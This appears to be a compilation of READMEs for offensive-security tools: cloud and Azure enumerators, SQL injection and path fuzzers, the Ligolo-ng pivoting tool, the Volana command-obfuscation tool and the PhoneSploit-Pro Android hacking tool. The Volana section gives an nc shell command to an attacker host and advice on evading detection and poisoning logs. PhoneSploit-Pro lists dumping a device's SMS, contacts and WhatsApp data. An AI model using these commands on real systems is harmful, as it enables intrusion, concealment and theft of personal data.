CloudBrute - Awesome Cloud Enumerator

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available. here

Motivation

we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:

• separated wordlists
• lack of proper concurrency
• lack of supporting all major cloud providers
• require authentication or keys or cloud CLI access
• outdated endpoints and regions
• Incorrect file storage detection
• lack support for proxies (useful for bypassing region restrictions)
• lack support for user agent randomization (useful for bypassing rare restrictions)
• hard to use, poorly configured

Features

• Cloud detection (IPINFO API and Source Code)
• Supports all major providers
• Black-Box (unauthenticated)
• Fast (concurrent)
• Modular and easily customizable
• Cross Platform (windows, linux, mac)
• User-Agent Randomization
• Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operation system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

It looks like this

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http"  # socks5 / http
ipinfo: ""      # IPINFO.io API KEY

For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 ██████╗██╗      ██████╗ ██╗   ██╗██████╗ ██████╗ ██████╗ ██╗   ██╗████████╗███████╗
██╔════╝██║     ██╔═══██╗██║   ██║██╔══██╗██╔══██╗██╔══██╗██║   ██║╚══██╔══╝██╔════╝
██║     ██║     ██║   ██║██║   ██║██║  ██║██████╔╝██████╔╝██║   ██║   ██║   █████╗  
██║     ██║     ██║   ██║██║   ██║██║  ██║██╔══██╗██╔══██╗██║   ██║   ██║   ██╔══╝  
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝██████╔╝██║  ██║╚██████╔╝   ██║   ███████╗
 ╚═════╝╚══════╝ ╚═════╝  ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝    ╚═╝   ╚══════╝
                                                V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
                  -w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
                  <integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
                  [-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
                  [-m|--mode "<value>"] [-o|--output "<value>"]
                  [-C|--configFolder "<value>"]

                  Awesome Cloud Enumerator

Arguments:

  -h  --help          Print help information
  -d  --domain        domain
  -k  --keyword       keyword used to generator urls
  -w  --wordlist      path to wordlist
  -c  --cloud         force a search, check config.yaml providers list
  -t  --threads       number of threads. Default: 80
  -T  --timeout       timeout per request in seconds. Default: 10
  -p  --proxy         use proxy list
  -a  --randomagent   user agent randomization
  -D  --debug         show debug logs. Default: false
  -q  --quite         suppress all output. Default: false
  -m  --mode          storage or app. Default: storage
  -o  --output        Output file. Default: out.txt
  -C  --configFolder  Config path. Default: config

for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

• Clone the repo
• go build -o CloudBrute main.go
• go test internal

in action

Volana - Shell Command Obfuscation To Avoid Detection Systems

Usage

You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

from non interactive shell

Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

On attacker machine

## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copy encrypted command and executed it with your rce on target machine

./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

Detection

Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

By detected we mean if we are able to trigger an alert if a certain command has been executed.

Hide from

Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

• Detection systems that are based on history command output
• Detection systems that are based on history files
• .bash_history, ".zsh_history" etc ..
• Detection systems that are based on bash debug traps
• Detection systems that are based on sudo built-in logging system
• Detection systems tracing all processes syscall system-wide (eg opensnoop)
• Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
• Easy to detect & avoid: pkill -9 script
• Not a common case
• screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
• Command detection Could be avoid with volana with encryption

Visible for

• Detection systems that have alert for unknown command (volana one)
• Detection systems that are based on keylogger
• Easy to avoid: copy/past commands
• Not a common case
• Detection systems that are based on syslog files (e.g. /var/log/auth.log)
• Only for sudo or su commands
• syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
• Detection systems that are based on syscall (eg auditd,LKML/eBPF)
• Difficult to analyze, could be make unreadable by making several diversion syscalls
• Custom LD_PRELOAD injection to make log
• Not a common case at all

Bug bounty

Sorry for the clickbait title, but no money will be provided for contibutors. 🐛

Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

Report here

Credit

• 8 ways to spy on console
• moonwalk: similar tool that clear tracks AFTER passage

SQLMC - Check All Urls Of A Domain For SQL Injections

SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

Features

• Scans a domain for SQL injection vulnerabilities
• Crawls the given URL up to a specified depth
• Checks each link for SQL injection vulnerabilities
• Reports vulnerabilities along with server information and depth

Installation

1. Install the required dependencies: bash pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

• -u, --url: The URL to scan (required)
• -d, --depth: The depth to scan (required)
• -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

• Check for multiple GET params
• Better injection checker trigger methods

Credits

• Developed by Miguel Álvarez

License

This project is licensed under the GNU Affero General Public License v3.0.

AzSubEnum - Azure Service Subdomain Enumeration

AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.

AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.

With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.

During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.

➜  AzSubEnum git:(main) ✗ python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]

Azure Subdomain Enumeration

options:
  -h, --help            show this help message and exit
  -b BASE, --base BASE  Base name to use
  -v, --verbose         Show verbose output
  -t THREADS, --threads THREADS
                        Number of threads for concurrent execution
  -p PERMUTATIONS, --permutations PERMUTATIONS
                        File containing permutations

Basic enumeration:

python3 azsubenum.py -b retailcorp --thread 10

Using permutation wordlists:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt

With verbose output:

python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

Features

• Tun interface (No more SOCKS!)
• Simple UI with agent selection and network information
• Easy to use and setup
• Automatic certificate configuration with Let's Encrypt
• Performant (Multiplexing)
• Does not require high privileges
• Socket listening/binding on the agent
• Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

• SYN are translated to connect() on remote
• SYN-ACK is sent back if connect() succeed
• RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
• Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] » ifconfig 
[...]
┌─────────────────────────────────────────────┐
│ Interface 3                                 │
├──────────────┬──────────────────────────────┤
│ Name         │ wlp3s0                       │
│ Hardware MAC │ de:ad:be:ef:ca:fe            │
│ MTU          │ 1500                            │
│ Flags        │ up|broadcast|multicast       │
│ IPv4 Address │ 192.168.0.30/24             │
└──────────────┴──────────────────────────────┘

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx     Mét         MTU          État                Nom
---  ----------  ----------  ------------  ---------------------------
 25           5       65535  connected     ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation   

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!            

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] » listener_list 
┌───────────────────────────────────────────────────────────────────────────────┐
│ Active listeners                                                              │
├───┬─────────────────────────┬─────   ───────────────────┬────────────────────────┤
│ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
├───┼─────────────────────────┼────────────────────────┼────────────────────────&   #9508;
│ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
└───┴─────────────────────────┴────────────────────────┴────────────────────────┘

[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.                             

Demo

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

• TCP
• UDP
• ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval           Transfer     Bitrate         Retr  Cwnd
[  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes       
[  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes       
[  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes       
[  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes       
[  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes       
[  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes       
[  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes       
[  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes       
[  5]   8.   00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes       
[  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes       
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval           Transfer     Bitrate         Retr
[  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender
[  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

• Implement other ICMP error messages (this will speed up UDP scans) ;
• Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
• Add mTLS support.

Credits

• Nicolas Chatelain <nicolas -at- chatelain.me>

Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns

Features

• Afuzz automatically detects the development language used by the website, and generates extensions according to the language
• Uses blacklist to filter invalid pages
• Uses whitelist to find content that bug bounty hunters are interested in in the page
• filters random content in the page
• judges 404 error pages in multiple ways
• perform statistical analysis on the results after scanning to obtain the final result.
• support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|                                                                                    http://testphp.vulnweb.com/                                                                                    |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
|            target           |         path        | status |              redirect             |         title         | length |       content-type       | lines | words |    type   |   mark   |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+   -----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml |  200   |                                   |                       | 12437  |         text/xml         |  217  |  774  |   check   |          |
| http://testphp.vulnweb.com/ |        admin        |  301   | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently |  169   |        text/html         |   8   |   11  |   folder  |   30x    |
| http://testphp.vulnweb.com/ |      login.php      |  200   |                                   |       login page      |  5009  |        text/html         |  120  |  432  |   check   |          |
| http://testphp.vulnweb.com/ |     .idea/.name     |  200   |                                   |                       |   6    | application/octet-stream |   1   |   1   |   check   |          |
| http://testphp.vulnweb.com/ |    .idea/vcs.xml    |  200   |                                   |                       |  173   |         text/xml         |   8   |   13  |   check   |          |
| http://testphp.vulnweb.com/ |        .idea/       |  200   |                                   |    Index of /.idea/   |  937   |        text/html         |   14  |   46  | whitelist | index of |
| http://testphp.vulnweb.com/ |       cgi-bin/      |  403   |                                   |     403 Forbidden     |  276   |        text/html         |   10  |   28  |   folder  |   403    |
| http://testphp.vulnweb.com/ | .idea/encodings.xml |  200   |                                   |                       |  171   |         text/xml         |   6   |   11  |   check   |          |
| http://testphp.vulnweb.com/ |      search.php     |  200   |                                   |         search        |  4218  |        text/html         |  104  |  364  |   check   |          |
| http://testphp.vulnweb.com/ |     produc   t.php  |  200   |                                   |    picture details    |  4576  |        text/html         |  111  |  377  |   check   |          |
| http://testphp.vulnweb.com/ |        admin/       |  200   |                                   |    Index of /admin/   |  248   |        text/html         |   8   |   16  | whitelist | index of |
| http://testphp.vulnweb.com/ |        .idea        |  301   | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently |  169   |        text/html         |   8   |   11  |   folder  |   30x    |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+```

Json

{
    "result": [
        {
            "target": "http://testphp.vulnweb.com/",
            "path": ".idea/workspace.xml",
            "status": 200,
            "redirect": "",
            "title": "",
            "length": 12437,
            "content_type": "text/xml",
            "lines": 217,
            "words": 774,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea/workspace.xml"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "admin",
            "status": 301,
            "redirect": "http://testphp.vulnweb.com/admin/",
            "title": "301 Moved Permanently",
            "length": 169,
            "content_type": "text/html",
            "lines": 8,
            "words   ": 11,
            "type": "folder",
            "mark": "30x",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/admin"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "login.php",
            "status": 200,
            "redirect": "",
            "title": "login page",
            "length": 5009,
            "content_type": "text/html",
            "lines": 120,
            "words": 432,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/login.php"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": ".idea/.name",
            "status": 200,
            "redirect": "",
            "title": "",
               "length": 6,
            "content_type": "application/octet-stream",
            "lines": 1,
            "words": 1,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea/.name"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": ".idea/vcs.xml",
            "status": 200,
            "redirect": "",
            "title": "",
            "length": 173,
            "content_type": "text/xml",
            "lines": 8,
            "words": 13,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea/vcs.xml"
        },
        {
            "target": "http://testphp.vulnweb.com/",
               "path": ".idea/",
            "status": 200,
            "redirect": "",
            "title": "Index of /.idea/",
            "length": 937,
            "content_type": "text/html",
            "lines": 14,
            "words": 46,
            "type": "whitelist",
            "mark": "index of",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea/"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "cgi-bin/",
            "status": 403,
            "redirect": "",
            "title": "403 Forbidden",
            "length": 276,
            "content_type": "text/html",
            "lines": 10,
            "words": 28,
            "type": "folder",
            "mark": "403",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
               "url": "http://testphp.vulnweb.com/cgi-bin/"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": ".idea/encodings.xml",
            "status": 200,
            "redirect": "",
            "title": "",
            "length": 171,
            "content_type": "text/xml",
            "lines": 6,
            "words": 11,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea/encodings.xml"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "search.php",
            "status": 200,
            "redirect": "",
            "title": "search",
            "length": 4218,
            "content_type": "text/html",
            "lines": 104,
            "words": 364,
            "t   ype": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/search.php"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "product.php",
            "status": 200,
            "redirect": "",
            "title": "picture details",
            "length": 4576,
            "content_type": "text/html",
            "lines": 111,
            "words": 377,
            "type": "check",
            "mark": "",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/product.php"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": "admin/",
            "status": 200,
            "redirect": "",
            "title": "Index of /admin/",
               "length": 248,
            "content_type": "text/html",
            "lines": 8,
            "words": 16,
            "type": "whitelist",
            "mark": "index of",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/admin/"
        },
        {
            "target": "http://testphp.vulnweb.com/",
            "path": ".idea",
            "status": 301,
            "redirect": "http://testphp.vulnweb.com/.idea/",
            "title": "301 Moved Permanently",
            "length": 169,
            "content_type": "text/html",
            "lines": 8,
            "words": 11,
            "type": "folder",
            "mark": "30x",
            "subdomain": "testphp.vulnweb.com",
            "depth": 0,
            "url": "http://testphp.vulnweb.com/.idea"
        }
    ],
    "total": 12,
    "targe   t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

• Wordlist is a text file, each line is a path.
• About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
• Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

• Normal extensions

index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx

• host

%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and php extension will genrate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip

Options

    #     ###### ### ###  ######  ######
    #      #   #  #   #   #   #   #   #
   # #     # #    #   #   #  #    #  #
   # #     ###    #   #     #       #
  #  #    #  #   #   #      #       #
  #####   #      #   #     #  #    #  #
 #    #   #      #   #    #   #   #   #
###  ### ###      ###    ######  ######



usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -o OUTPUT, --output OUTPUT
                        Output file
  -e EXTENSIONS, --extensions EXTENSIONS
                        Extension list separated by commas (Example: php,aspx,jsp)
  -t THREAD, --thread THREAD
                        Number of threads
  -d DEPTH,    --depth DEPTH
                        Maximum recursion depth
  -w WORDLIST, --wordlist WORDLIST
                        wordlist
  -f, --fullpath        fullpath
  -p PROXY, --proxy PROXY
                        proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target

afuzz -e php,html,js,json -u https://target

afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --threads) reflects the number of separated brute force processes. And so the bigger the thread number is, the faster afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. And as a warning, we advise you to keep the threads number not too big because it can cause DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_stirng.txt file is a text file, one per line. The format is position==content. With == as the separator, position has the following options: header, body, regex, title

Language detection

The language.txt is the detection language rule, the format is consistent with bad_string.txt. Development language detection for website usage.

References

Thanks to open source projects for inspiration

• Dirsearch by by Shubham Sharma
• wfuzz by Xavi Mendez
• arjun by Somdev Sangwan

PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session

An all-in-one hacking tool written in Python to remotely exploit Android devices using ADB (Android Debug Bridge) and Metasploit-Framework.

Complete Automation to get a Meterpreter session in One Click

This tool can automatically Create, Install, and Run payload on the target device using Metasploit-Framework and ADB to completely hack the Android Device in one click.

The goal of this project is to make penetration testing on Android devices easy. Now you don't have to learn commands and arguments, PhoneSploit Pro does it for you. Using this tool, you can test the security of your Android devices easily.

PhoneSploit Pro can also be used as a complete ADB Toolkit to perform various operations on Android devices over Wi-Fi as well as USB.

Features

v1.0

• Connect device using ADB remotely.
• List connected devices.
• Disconnect all devices.
• Access connected device shell.
• Stop ADB Server.
• Take screenshot and pull it to computer automatically.
• Screen Record target device screen for a specified time and automatically pull it to computer.
• Download file/folder from target device.
• Send file/folder from computer to target device.
• Run an app.
• Install an APK file from computer to target device.
• Uninstall an app.
• List all installed apps in target device.
• Restart/Reboot the target device to System, Recovery, Bootloader, Fastboot.
• Hack Device Completely :
  • Automatically fetch your IP Address to set LHOST.
  • Automatically create a payload using msfvenom, install it, and run it on target device.
  • Then automatically launch and setup Metasploit-Framework to get a meterpreter session.
  • Getting a meterpreter session means the device is completely hacked using Metasploit-Framework, and you can do anything with it.

v1.1

• List all files and folders of the target devices.
• Copy all WhatsApp Data to computer.
• Copy all Screenshots to computer.
• Copy all Camera Photos to computer.
• Take screenshots and screen-record anonymously (Automatically delete file from target device).
• Open a link on target device.
• Display an image/photo on target device.
• Play an audio on target device.
• Play a video on target device.
• Get device information.
• Get battery information.
• Use Keycodes to control device remotely.

v1.2

• Send SMS through target device.
• Unlock device (Automatic screen on, swipe up and password input).
• Lock device.
• Dump all SMS from device to computer.
• Dump all Contacts from device to computer.
• Dump all Call Logs from device to computer.
• Extract APK from an installed app.

v1.3

• Mirror and Control the target device.

v1.4

• Power off the target device.

Requirements

• python3 : Python 3.10 or Newer
• adb : Android Debug Bridge (ADB) from Android SDK Platform Tools
• metasploit-framework : Metasploit-Framework (msfvenom and msfconsole)
• scrcpy : Scrcpy (Screen Copy)

Run PhoneSploit Pro

PhoneSploit Pro does not need any installation and runs directly using python3

On Linux / macOS :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git

cd PhoneSploit-Pro/

python3 phonesploitpro.py

On Windows :

Make sure all the required software are installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git

cd PhoneSploit-Pro/

1. Download and extract latest platform-tools from here.

2. Copy all files from the extracted platform-tools or adb directory to PhoneSploit-Pro directory and then run :

python phonesploitpro.py

Screenshots

Installing ADB

ADB on Linux :

Open terminal and paste the following commands :

• Debian / Ubuntu

sudo apt update

sudo apt install adb

• Fedora

sudo dnf install adb

• Arch Linux / Manjaro

sudo pacman -Sy android-tools

For other Linux Distributions : Visit this Link

ADB on macOS :

Open terminal and paste the following command :

brew install android-platform-tools

or Visit this link : Click Here

ADB on Windows :

Visit this link : Click Here

ADB on Termux :

pkg update

pkg install android-tools

Installing Metasploit-Framework

On Linux / macOS :

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

